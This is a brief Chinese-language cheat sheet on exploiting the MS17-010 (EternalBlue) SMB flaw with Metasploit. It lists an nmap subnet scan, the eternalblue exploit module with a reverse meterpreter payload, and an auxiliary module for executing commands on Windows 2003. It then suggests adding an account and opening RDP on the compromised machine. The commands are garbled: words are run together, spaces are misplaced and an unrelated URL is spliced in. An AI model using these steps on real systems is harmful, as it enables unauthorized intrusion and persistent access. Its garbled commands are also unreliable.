MSF在MSF上的常规17-010游戏如下
扫描ms17-010是否存在漏洞。 多采用namp、fscan和msf等扫描方式
nmap-n-p445-- script smb- vuln-ms17-010192.168.1.0/24-- open http://www.Sina.com /
msfuseexploit/windows/SMB/ms17 _ 010 _ eternal blue目标出现在网上时反向命中: msfsetpayloadwindows/x64/meter preter /
如果目标为win2003,则目标计算机存在漏洞,但可能无法返回session
相反,直接执行系统命令
ms F5 use auxiliary/admin/SMB/ms17 _ 010 _ command ms F5 setcommandwhoamimsf5setrhostsx.x.x.x
如果能执行指令,就容易做~~可以添加账号,打开3389